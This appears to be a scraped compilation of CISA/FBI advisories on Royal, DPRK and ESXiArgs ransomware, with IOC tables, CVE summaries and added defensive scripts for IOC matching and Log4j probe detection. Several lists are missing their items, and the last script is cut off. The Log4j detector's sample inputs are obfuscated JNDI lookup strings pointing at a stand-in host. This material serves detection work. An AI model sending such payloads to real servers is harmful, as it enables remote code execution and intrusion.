See tables 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.

| IOC | Description |
|---|---|
| .royal | Encrypted file extension |
| README.TXT | Ransom note |

| Malicious IP | Last Activity |
|---|---|
| 102.157.44[.]105 | November 2022 |
| 105.158.118[.]241 | November 2022 |
| 105.69.155[.]85 | November 2022 |
| 113.169.187[.]159 | November 2022 |
| 134.35.9[.]209 | November 2022 |
| 139.195.43[.]166 | November 2022 |
| 139.60.161[.]213 | November 2022 |
| 148.213.109[.]165 | November 2022 |
| 163.182.177[.]80 | November 2022 |
| 181.141.3[.]126 | November 2022 |
| 181.164.194[.]228 | November 2022 |
| 185.143.223[.]69 | November 2022 |
| 186.64.67[.]6 | November 2022 |
| 186.86.212[.]138 | November 2022 |
| 190.193.180[.]228 | November 2022 |
| 196.70.77[.]11 | November 2022 |
| 197.11.134[.]255 | November 2022 |
| 197.158.89[.]85 | November 2022 |
| 197.204.247[.]7 | November 2022 |
| 197.207.181[.]147 | November 2022 |
| 197.207.218[.]27 | November 2022 |
| 197.94.67[.]207 | November 2022 |
| 23.111.114[.]52 | November 2022 |
| 41.100.55[.]97 | November 2022 |
| 41.107.77[.]67 | November 2022 |
| 41.109.11[.]80 | November 2022 |
| 41.251.121[.]35 | November 2022 |
| 41.97.65[.]51 | November 2022 |
| 42.189.12[.]36 | November 2022 |
| 45.227.251[.]167 | November 2022 |
| 5.44.42[.]20 | November 2022 |
| 61.166.221[.]46 | November 2022 |
| 68.83.169[.]91 | November 2022 |
| 81.184.181[.]215 | November 2022 |
| 82.12.196[.]197 | November 2022 |
| 98.143.70[.]147 | November 2022 |
| 140.82.48[.]158 | December 2022 |
| 147.135.36[.]162 | December 2022 |
| 147.135.11[.]223 | December 2022 |
| 152.89.247[.]50 | December 2022 |
| 172.64.80[.]1 | December 2022 |
| 179.43.167[.]10 | December 2022 |
| 185.7.214[.]218 | December 2022 |
| 193.149.176[.]157 | December 2022 |
| 193.235.146[.]104 | December 2022 |
| 209.141.36[.]116 | December 2022 |
| 45.61.136[.]47 | December 2022 |
| 45.8.158[.]104 | December 2022 |
| 5.181.234[.]58 | December 2022 |
| 5.188.86[.]195 | December 2022 |
| 77.73.133[.]84 | December 2022 |
| 89.108.65[.]136 | December 2022 |
| 94.232.41[.]105 | December 2022 |
| 47.87.229[.]39 | January 2023 |

| Malicious Domain | Last Observed |
|---|---|
| ciborkumari[.]xyz | October 2022 |
| sombrat[.]com | October 2022 |
| gororama[.]com | November 2022 |
| softeruplive[.]com | November 2022 |
| altocloudzone[.]live | December 2022 |
| ciborkumari[.]xyz | December 2022 |
| myappearinc[.]com | December 2022 |
| parkerpublic[.]com | December 2022 |
| pastebin.mozilla[.]org/Z54Vudf9/raw | December 2022 |
| tumbleproperty[.]com | December 2022 |
| myappearinc[.]com/acquire/draft/c7lh0s5jv | January 2023 |

| Tool | SHA256 |
|---|---|
| AV tamper | 8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375 |
| TCP/UDP Tunnel over HTTP (Chisel) | 8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451 |
| Ursnif/Gozi | be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1 |
| Exfil | B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20 |
| Remote Access (AnyDesk) | 4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7 |
| PowerShell Toolkit Downloader | 4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce |
| PsExec (Microsoft Sysinternals) | 08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c |
| Keep Host Unlocked (Don't Sleep) | f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee |
| Ransomware Executable | d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681 |
| Windows Command Line (NirCmd) | 216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5 |
| System Management (NSudo) | 19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618 |

Batch scripts (hash values are given as published; the 40-hex values are SHA-1 digests, the 64-hex values SHA-256):

| Filename | Hash Value |
|---|---|
| 2.bat | 585b05b290d241a249af93b1896a9474128da969 |
| 3.bat | 41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d |
| 4.bat | a84ed0f3c46b01d66510ccc9b1fc1e07af005c60 |
| 8.bat | c96154690f60a8e1f2271242e458029014ffe30a |
| kl.bat | 65dc04f3f75deb3b287cca3138d9d0ec36b8bea0 |
| gp.bat | 82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58 |
| r.bat | 74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c |
| runanddelete.bat | 342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE |
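An added Python example, not from the advisory, for applying the tables above in a hunt: it refangs the bracketed indicators, infers the digest algorithm from hash length (the batch-script rows mix 40-hex SHA-1 and 64-hex SHA-256 values, and the tool table mixes upper and lower case), separates bare domains from URL-path indicators such as myappearinc[.]com/acquire/draft/c7lh0s5jv, and matches everything against constructed proxy, EDR and DNS log lines. Only a handful of the indicators are loaded; the log lines, internal addresses and timestamps are constructed. As the note above says, an IP hit on its own should be vetted before blocking.

```python
import re


def refang(indicator):
    """Undo the advisory's defanging (45.61.136[.]47, sombrat[.]com) and normalise case."""
    return indicator.strip().lower().replace("[.]", ".").replace("hxxp", "http")


HASH_ALGO_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}


def classify_hash(digest):
    """Lower-case the digest and infer the algorithm from its length."""
    h = digest.strip().lower()
    if len(h) not in HASH_ALGO_BY_LEN or not re.fullmatch(r"[0-9a-f]+", h):
        raise ValueError(f"not a hex digest of a known length: {digest!r}")
    return HASH_ALGO_BY_LEN[len(h)], h


def load_iocs(ips, domains, hashes):
    """Bucket indicators by type. A 'domain' entry containing a path (myappearinc[.]com/acquire/...)
    is a URL indicator and is matched as a substring rather than as a host name."""
    ioc = {"ip": set(), "domain": set(), "url": set(), "md5": set(), "sha1": set(), "sha256": set()}
    for ip in ips:
        ioc["ip"].add(refang(ip))
    for d in domains:
        d = refang(d)
        ioc["url" if "/" in d else "domain"].add(d)
    for h in hashes:
        algo, digest = classify_hash(h)
        ioc[algo].add(digest)
    return ioc


IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
HEX_RE = re.compile(r"\b(?:[0-9a-fA-F]{64}|[0-9a-fA-F]{40}|[0-9a-fA-F]{32})\b")


def domain_hit(host, domains):
    """Exact or parent-domain match: cdn.sombrat.com hits sombrat.com, notsombrat.com does not."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_line(line, ioc):
    """All (type, indicator) hits in one log line."""
    hits, low = [], line.lower()
    for ip in IP_RE.findall(line):
        if ip in ioc["ip"]:
            hits.append(("ip", ip))
    for host in sorted(set(HOST_RE.findall(line))):
        if domain_hit(host, ioc["domain"]):
            hits.append(("domain", host.lower()))
    for url in sorted(ioc["url"]):
        if url in low:
            hits.append(("url", url))
    for h in HEX_RE.findall(line):
        algo, digest = classify_hash(h)
        if digest in ioc[algo]:
            hits.append((algo, digest))
    return hits


def scan(lines, ioc):
    """(line index, hits) for every line with at least one hit."""
    out = []
    for i, line in enumerate(lines):
        hits = scan_line(line, ioc)
        if hits:
            out.append((i, hits))
    return out


# A subset of the indicators from the tables above, in the defanged form they are published in.
SAMPLE_IPS = ["47.87.229[.]39", "94.232.41[.]105"]
SAMPLE_DOMAINS = ["sombrat[.]com", "myappearinc[.]com", "myappearinc[.]com/acquire/draft/c7lh0s5jv"]
SAMPLE_HASHES = ["8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451",  # Chisel
                 "585b05b290d241a249af93b1896a9474128da969",                          # 2.bat (SHA-1)
                 "216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5"]  # NirCmd

# Constructed log lines; internal hosts and timestamps are made up.
SAMPLE_LOG = [
    "2023-01-09T10:02:11Z proxy allow src=10.1.4.22 dst=47.87.229.39 method=CONNECT",
    "2023-01-09T10:03:40Z proxy allow src=10.1.4.22 url=http://myappearinc.com/acquire/draft/c7lh0s5jv",
    "2023-01-09T10:05:02Z edr file_create path=C:\\Temp\\2.bat sha1=585b05b290d241a249af93b1896a9474128da969",
    "2023-01-09T10:05:09Z edr file_create path=C:\\ProgramData\\c.exe sha256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451",
    "2023-01-09T10:06:00Z dns query name=cdn.sombrat.com src=10.1.4.22",
    "2023-01-09T10:07:00Z dns query name=notsombrat.com src=10.1.4.22",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG, load_iocs(SAMPLE_IPS, SAMPLE_DOMAINS, SAMPLE_HASHES)):
        print(idx, hits)
```

The parent-domain rule is deliberate: blocking or alerting on sombrat[.]com should cover its subdomains, but a substring match would also fire on notsombrat.com, which is why hosts are compared on label boundaries.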
See table 3 for all referenced threat actor tactics and techniques included in this advisory.

| Tactic | Technique Title | ID | Use |
|---|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 | The actors gain initial access through public-facing applications. |
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 | The actors gain initial access through malicious PDF attachments sent via email. |
| Initial Access | Phishing: Spearphishing Link | T1566.002 | The actors gain initial access using malvertising links via emails and public-facing sites. |
| Initial Access | External Remote Services | T1133 | The actors gain initial access through a variety of RMM software. |
| Command and Control | Ingress Tool Transfer | T1105 | The actors used C2 infrastructure to download multiple tools. |
| Command and Control | Protocol Tunneling | T1572 | The actors used an encrypted SSH tunnel to communicate within C2 infrastructure. |
| Privilege Escalation | Valid Accounts: Domain Accounts | T1078.002 | The actors used encrypted files to create new admin user accounts. |
| Defense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 | The actors deactivated antivirus protocols. |
| Defense Evasion | Domain Policy Modification: Group Policy Modification | T1484.001 | The actors modified Group Policy Objects to subvert antivirus protocols. |
| Defense Evasion | Indicator Removal: Clear Windows Event Logs | T1070.001 | The actors deleted shadow files and system and security logs after exfiltration. |
| Lateral Movement | Remote Services: Remote Desktop Protocol | T1021.001 | The actors used valid accounts to move laterally through the domain controller using RDP. |
| Collection | Automated Collection | T1119 | The actors used registry keys to auto-extract and collect files. |
| Impact | Data Encrypted for Impact | T1486 | The actors encrypted data to determine which files were being used or blocked by other applications. |
FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
[1] Royal Rumble: Analysis of Royal Ransomware (cybereason.com)
[2] DEV-0569 finds new ways to deliver Royal ransomware, various payloads - Microsoft Security Blog
[3] 2023-01: ACSC Ransomware Profile - Royal | Cyber.gov.au
Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA.
Note: This Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and various ransomware threat actors. These #StopRansomware advisories detail historically and recently observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn about other ransomware threats and no-cost resources.
The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.
This CSA provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware and updates the July 6, 2022, joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. This advisory highlights TTPs and IOCs DPRK cyber actors used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.
The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments—specific targets include Department of Defense Information Networks and Defense Industrial Base member networks. The IOCs in this product should be useful to sectors previously targeted by DPRK cyber operations (e.g., U.S. government, Department of Defense, and Defense Industrial Base). The authoring agencies highly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.
For additional information on state-sponsored DPRK malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage.
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
This CSA is supplementary to previous reports on malicious cyber actor activities involving DPRK ransomware campaigns—namely Maui and H0lyGh0st ransomware. The authoring agencies are issuing this advisory to highlight additional observed TTPs DPRK cyber actors are using to conduct ransomware attacks targeting South Korean and U.S. healthcare systems.
The TTPs associated with DPRK ransomware attacks include those traditionally observed in ransomware operations. Additionally, these TTPs span phases from acquiring and purchasing infrastructure to concealing DPRK affiliation:
Actors also likely spread malicious code through Trojanized files for "X-Popup," an open source messenger commonly used by employees of small and medium hospitals in South Korea [T1195].
The actors spread malware by leveraging two domains: xpopup.pe[.]kr and xpopup[.]com. xpopup.pe[.]kr is registered to IP address 115.68.95[.]128 and xpopup[.]com is registered to IP address 119.205.197[.]111. Related file names and hashes are listed in table 1.
File Name | MD5 Hash |
---|---|
xpopup.rar | 1f239db751ce9a374eb9f908c74a31c9 |
X-PopUp.exe | 6fb13b1b4b42bac05a2ba629f04e3d03 |
X-PopUp.exe | cf8ba073db7f4023af2b13dd75565f3d |
xpopup.exe | 4e71d52fc39f89204a734b19db1330d3 |
x-PopUp.exe | 43d4994635f72852f719abb604c4a8a1 |
xpopup.exe | 5ae71e8440bf33b46554ce7a7f3de666 |
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the U.S. National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. For more information on the CPGs, including additional recommended baseline protections, see cisa.gov/cpg.
The authoring agencies urge HPH organizations to:
In addition, the authoring agencies urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for and mitigate ransomware incidents:
If a ransomware incident occurs at your organization:
Stairwell provided a YARA rule to identify Maui ransomware, and a Proof of Concept public RSA key extractor at the following link:
https://www.stairwell.com/news/threat-research-report-maui-ransomware/
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files. As stated above, the authoring agencies discourage paying ransoms. Payment does not guarantee files will be recovered and may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, the agencies understand that when victims are faced with an inability to function, all options are evaluated to protect shareholders, employees, and customers.
Regardless of whether you or your organization decide to pay a ransom, the authoring agencies urge you to promptly report ransomware incidents using the contact information above.
NSA, FBI, CISA, and HHS would like to thank ROK NIS and DSA for their contributions to this CSA.
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
Microsoft Threat Intelligence Center is a registered trademark of Microsoft Corporation. Apache® and Apache Log4j are trademarks of the Apache Software Foundation. SonicWall is a trademark of SonicWall Inc. TerraMaster Operating System is a registered trademark of Octagon Systems.
This document was developed in furtherance of the authors’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
| CVE-2021-44228 | CVSS 3.0: 10 (Critical) |
|---|---|
| Vulnerability Description | Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From Log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. |
| Recommended Mitigations | Apply patches provided by the vendor and perform required system updates. |
| Detection Methods | See vendors' Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability. |
| Vulnerable Technologies and Versions | There are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, see https://nvd.nist.gov/vuln/detail/CVE-2021-44228. |
| Reference | https://nvd.nist.gov/vuln/detail/CVE-2021-44228 |
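To make "message lookup substitution" concrete for detection, here is an added Python example, not part of the advisory or of the Apache project: it URL-decodes a request string, resolves the nested Log4j 2 lookup forms commonly used to obfuscate probes (${lower:x}, ${upper:x} and the ${key:-default} default-value form) from the inside out, and then checks the normalized string for ${jndi:. The request lines are constructed samples with a documentation-range host. Lookups that cannot be evaluated offline (env, sys, date and the like) are left in place, and the classifier reports any remaining nested lookup as suspicious in its own right, since an attacker can push the decisive characters into values only the target can resolve.

```python
import re
from urllib.parse import unquote

# Innermost ${...}: a body with no nested '${' or '}' inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j 2 would, for the forms used to obfuscate probes."""
    body = m.group(1)
    if ":-" in body:                          # ${anything:-default} -> default, so ${::-j} -> j
        return body.split(":-", 1)[1]
    key, sep, rest = body.partition(":")
    if sep and key.lower() == "lower":
        return rest.lower()
    if sep and key.lower() == "upper":
        return rest.upper()
    return m.group(0)                         # jndi, env, sys, date ... cannot be resolved offline


def normalize_lookups(s, max_rounds=32):
    """URL-decode, then collapse nested lookups from the inside out until nothing changes."""
    s = unquote(unquote(s))                   # twice, to catch %2524%257B-style double encoding
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s


JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")


def classify(s):
    """'jndi' for a resolved JNDI lookup, 'nested' for lookups that would not collapse, else None."""
    norm = normalize_lookups(s)
    if JNDI_RE.search(norm):
        return "jndi"
    if NESTED_RE.search(norm):
        return "nested"
    return None


def is_jndi_probe(s):
    return classify(s) == "jndi"


# Constructed request fragments (documentation-range host); not traffic from any report.
SAMPLE_REQUESTS = [
    "GET /?x=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1",
    "User-Agent: ${${lower:j}ndi:${lower:l}dap://203.0.113.5/a}",
    "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/x}",
    "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1",
    "User-Agent: ${${env:NOTHING:-j}ndi:${sys:NOPE:-ldap}://203.0.113.5/a}",
    "GET /index.html HTTP/1.1",
    "User-Agent: ${date:yyyy}",
]

if __name__ == "__main__":
    for r in SAMPLE_REQUESTS:
        print(f"{str(classify(r)):>6}  {normalize_lookups(r)}")
```

The normalizer is a triage aid, not a complete Log4j evaluator; it does not resolve bundled lookups such as env or sys, so the "nested" verdict exists precisely to keep those from slipping through as clean.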
| CVE-2021-20038 | CVSS 3.0: 9.8 (Critical) |
|---|---|
| Vulnerability Description | A stack-based buffer overflow vulnerability in the SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as the 'nobody' user on the appliance. This vulnerability affected SMA 200, 210, 400, 410, and 500v appliances running firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv, and earlier versions. |
| Recommended Mitigations | Apply all appropriate vendor updates and upgrade to the fixed firmware versions given in the SonicWall Security Advisories. System administrators should refer to the SonicWall Security Advisories in the reference section to determine affected applications/systems and appropriate fix actions. Support for 9.0.0 firmware ended on 10/31/2021. Customers still using that firmware are requested to upgrade to the latest 10.2.x versions. |
| Vulnerable Technologies and Versions | SonicWall SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v firmware 10.2.0.8-37sv, 10.2.1.1-19sv, and 10.2.1.2-24sv |
| Reference | https://nvd.nist.gov/vuln/detail/CVE-2021-20038 |
CVE-2022-24990 | CVSS 3.x: N/A |
---|---|
Vulnerability Description | The TerraMaster OS Unauthenticated Remote Command Execution via PHP Object Instantiation Vulnerability is characterized by scanning activity targeting a flaw in the script enabling a remote adversary to execute commands on the target endpoint. The vulnerability is created by improper input validation of the webNasIPS component in the api.php script and resides on the TNAS device appliances' operating system where users manage storage, backup data, and configure applications. By exploiting the script flaw a remote unauthenticated attacker can pass specially crafted data to the application and execute arbitrary commands on the target system. This may result in complete compromise of the target system, including the exfiltration of information. TNAS devices can be chained to acquire unauthenticated remote code execution with highest privileges. |
Recommended Mitigations | Install relevant vendor patches. This vulnerability was patched in TOS version 4.2.30. |
Vulnerable Technologies and Versions | TOS v4.2.29 |
See https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ and https://forum.terra-master.com/en/viewtopic.php?t=3030 for more information.
The IOC section includes hashes and IP addresses for the Maui and H0lyGh0st ransomware variants—as well as custom malware implants assumedly developed by DPRK cyber actors, such as remote access trojans (RATs), loaders, and other tools—that enable subsequent deployment of ransomware. For additional Maui IOCs, see joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.
Table 2 lists MD5 and SHA256 hashes associated with malware implants, RATs, and other tools used by DPRK cyber actors, including tools that drop Maui ransomware files.
Table 3 lists MD5 and SHA256 hashes associated with Maui ransomware files.
Table 4 lists MD5 and SHA256 hashes associated with H0lyGh0st Ransomware files.
NSA Client Requirements / General Cybersecurity Inquiries: CybersecurityReports@nsa.gov
Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
To report incidents and anomalous activity related to information found in this Joint Cybersecurity Advisory, contact CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870 or your local FBI field office at www.fbi.gov/contact-us/field. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
Media Inquiries / Press Desk:
The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.” Malicious actors may be exploiting known vulnerabilities in VMware ESXi servers that are likely running unpatched and out-of-service or out-of-date versions of VMware ESXi software to gain access and deploy ransomware. The ESXiArgs ransomware encrypts configuration files on ESXi servers, potentially rendering virtual machines (VMs) unusable.
CISA has released an ESXiArgs recovery script at github.com/cisagov/ESXiArgs-Recover. Organizations that have fallen victim to ESXiArgs ransomware can use this script to attempt to recover their files. This CSA provides guidance on how to use the script.
ESXiArgs actors have compromised over 3,800 servers globally. CISA and FBI encourage all organizations managing VMware ESXi servers to:
If malicious actors have compromised your organization with ESXiArgs ransomware, CISA and FBI recommend following the script and guidance provided in this CSA to attempt to recover access to your files.
Note: CISA and FBI will update this CSA as more information becomes available.
Open-source reporting indicates that malicious actors are exploiting known vulnerabilities in VMware ESXi software to gain access to servers and deploy ESXiArgs ransomware. The actors are likely targeting end-of-life ESXi servers or ESXi servers that do not have the available ESXi software patches applied.[1]
ESXiArgs ransomware encrypts certain configuration files on ESXi servers, potentially rendering VMs unusable. Specifically, the ransomware encrypts configuration files associated with the VMs; it does not encrypt flat files. As a result, it is possible, in some cases, for victims to reconstruct the encrypted configuration files based on the unencrypted flat file. The recovery script documented below automates the process of recreating configuration files. The full list of file extensions encrypted by the malware is: vmdk, vmx, vmxf, vmsd, vmsn, vswp, vmss, nvram, vmem.
CISA and FBI do not encourage paying the ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, CISA and FBI urge you to promptly report ransomware incidents to a local FBI Field Office, or to CISA at cisa.gov/report.
CISA is providing these steps to enable organizations to attempt recovery of their VMs. CISA’s GitHub ESXiArgs recovery script, which also outlines these steps, is available at github.com/cisagov/ESXiArgs-Recover. CISA is aware that some organizations have reported success in recovering files without paying ransoms. CISA’s script is based on findings published by third-party researchers.[2]
Any organization seeking to use CISA’s ESXiArgs recovery script should carefully review the script to determine if it is appropriate for their environment before deploying it. This script does not seek to delete the encrypted configuration files, but instead seeks to create new configuration files that enable access to the VMs. While CISA works to ensure that scripts like this one are safe and effective, this script is delivered without warranty, either implicit or explicit. Do not use this script without understanding how it may affect your system. CISA does not assume liability for damage caused by this script. Note: Organizations that run into problems with the script can create a GitHub issue at https://github.com/cisagov/ESXiArgs-Recover/issues; CISA will do its best to resolve concerns.
1. Download the script and save it as `/tmp/recover.sh`, for example with `wget`: `wget -O /tmp/recover.sh https://raw.githubusercontent.com/cisagov/ESXiArgs-Recover/main/recover.sh`.
2. Give the script permission to run: `chmod +x /tmp/recover.sh`.
3. Navigate to the folder of a VM you would like to recover and run `ls` to view the files. Note: You can browse these folders by running `ls /vmfs/volumes/datastore1`. For instance, if the folder is called `example`, run `cd /vmfs/volumes/datastore1/example`.
4. Run `ls` to view the files. Note the name of the VM (via naming convention: `[name].vmdk`).
5. Run the recovery script with `/tmp/recover.sh [name]`, where `[name]` is the name of the VM determined previously. If the VM uses a thin-format disk, run `/tmp/recover.sh [name] thin` instead.
6. If the recovery script was successful, re-register the VM:
   a. If the ESXi web interface is inaccessible, remove the ransom note and restore the interface: run `cd /usr/lib/vmware/hostd/docroot/ui/ && mv index.html ransom.html && mv index1.html index.html`, then run `cd /usr/lib/vmware/hostd/docroot && mv index.html ransom.html && rm index.html && mv index1.html index.html`, then reboot the ESXi server (for example with the `reboot` command). After a few minutes, you should be able to navigate to the web interface.
   b. If the VM you restored already exists in the web interface, right-click it and select Unregister (see figure 1).
   Figure 1: Unregistering the virtual machine.
   c. Select Create / Register VM (see figure 2).
   d. Select Register an existing virtual machine (see figure 2).
   Figure 2: Registering the virtual machine, selecting machine to register.
   e. Click Select one or more virtual machines, a datastore or a directory to navigate to the folder of the VM you restored. Select the `vmx` file in the folder (see figure 3).
   Figure 3: Registering the virtual machine, finalizing registration.
   f. Select Next and Finish. You should now be able to use the VM as normal.
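As an added example (not part of this advisory and not CISA's recover.sh), the POSIX shell helper below applies the recovery premise stated above to triage a datastore before running the script: for each disk it reports whether the descriptor survived, whether an intact flat file is still present to rebuild from, and how many 512-byte sectors a rebuilt descriptor would have to declare. The sample datastore it builds, its file contents, and the `[name].vmdk` / `[name]-flat.vmdk` naming assumption are the example's own.

```shell
#!/bin/sh
# Added example, not CISA's recover.sh: triage VM folders on an ESXi datastore
# after ESXiArgs. The ransomware encrypts the small descriptor/config files but
# leaves the large "-flat.vmdk" data files alone, so a disk is a recovery
# candidate when its flat file is intact but its [name].vmdk descriptor is gone
# or no longer valid. Assumes the [name].vmdk / [name]-flat.vmdk naming convention.

# Print ok, missing or damaged for the descriptor "$1/$2.vmdk". A genuine
# descriptor is plain text whose first line is "# Disk DescriptorFile".
descriptor_state() {
    desc="$1/$2.vmdk"
    if [ ! -f "$desc" ]; then
        echo missing
    elif head -n 1 "$desc" | grep -q '^# Disk DescriptorFile'; then
        echo ok
    else
        echo damaged
    fi
}

# Print the 512-byte sector count of "$1/$2-flat.vmdk", the "RW <sectors>"
# value a rebuilt descriptor must declare; fail if the flat file is absent or
# not sector-aligned (a truncated flat file cannot be rebuilt from either).
flat_sectors() {
    flat="$1/$2-flat.vmdk"
    [ -f "$flat" ] || return 1
    size=$(wc -c < "$flat" | tr -d ' ')
    [ "$((size % 512))" -eq 0 ] || return 1
    echo "$((size / 512))"
}

# One line per disk: "<name>: intact", "<name>: candidate <sectors>" or
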